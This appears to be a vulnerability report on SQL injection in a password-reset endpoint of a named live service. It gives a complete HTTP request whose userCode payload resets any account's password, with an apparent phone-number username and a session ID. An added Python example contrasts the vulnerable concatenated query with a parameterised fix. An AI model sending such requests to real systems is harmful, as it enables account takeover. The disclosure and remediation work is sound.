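The password-recovery endpoint here does not filter the verification code (userCode), so a request like the following is accepted:
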
POST http://biaoda.tomoon.cn/DigitalFrame HTTP/1.1
APIVersion: 1.0
Action: forgetPassword
Device-Type: MP
UUID: 868048029706082
Charset: UTF-8
Content-Type: application/json
UserID:
SessionID: 191fa4b4-4971-405b-942a-90a076fc78bf
Content-Length: 100
Host: biaoda.tomoon.cn
Connection: Keep-Alive

{"userName":"18518605216","userCode":"1=1 OR 1=1 ","userPassNew":"16D7A4FCA7442DDA3AD93C9A726597E4"}

This resets the password of any account; here it is reset to test1234.
Even the account 11111111111 can be reset with this method.
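
For the fix, the following added example (not code from the original report or from the vendor) contrasts a handler that concatenates userCode into the SQL text with one that validates its format and binds it as a parameter. The table layout, the six-digit code format, the function names and the use of SQLite are assumptions made for illustration; the account row is constructed sample data.

```python
import re
import sqlite3

CODE_RE = re.compile(r"[0-9]{6}")  # assumed format: six-digit SMS code


def make_db():
    """In-memory table standing in for the real store (constructed sample row)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_name TEXT PRIMARY KEY,"
                 " pass_hash TEXT, reset_code TEXT)")
    conn.execute("INSERT INTO users VALUES ('10000000001', 'OLDHASH', '493027')")
    return conn


def reset_unsafe(conn, user_name, user_code, new_hash):
    """'Before': userCode is pasted into the statement, so it is parsed as SQL."""
    sql = ("SELECT 1 FROM users WHERE user_name = '%s' AND reset_code = %s"
           % (user_name, user_code))
    if conn.execute(sql).fetchone() is None:
        return False
    conn.execute("UPDATE users SET pass_hash = ? WHERE user_name = ?",
                 (new_hash, user_name))
    return True


def reset_safe(conn, user_name, user_code, new_hash):
    """'After': strict format check, bound parameters, code consumed on use."""
    if not CODE_RE.fullmatch(user_code):
        return False
    cur = conn.execute(
        "UPDATE users SET pass_hash = ?, reset_code = NULL "
        "WHERE user_name = ? AND reset_code = ?",
        (new_hash, user_name, user_code))
    return cur.rowcount == 1  # exactly one row must match name AND code


def demo():
    payload = "1=1 OR 1=1 "  # userCode value from the request shown on this page
    user = "10000000001"
    return {
        "unsafe_payload": reset_unsafe(make_db(), user, payload, "NEWHASH"),
        "safe_payload": reset_safe(make_db(), user, payload, "NEWHASH"),
        "safe_wrong_code": reset_safe(make_db(), user, "000000", "NEWHASH"),
        "safe_right_code": reset_safe(make_db(), user, "493027", "NEWHASH"),
    }


if __name__ == "__main__":
    print(demo())
```

Because the hardened version clears reset_code in the same UPDATE that changes the password, a code that has been used once cannot be replayed.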
Demo
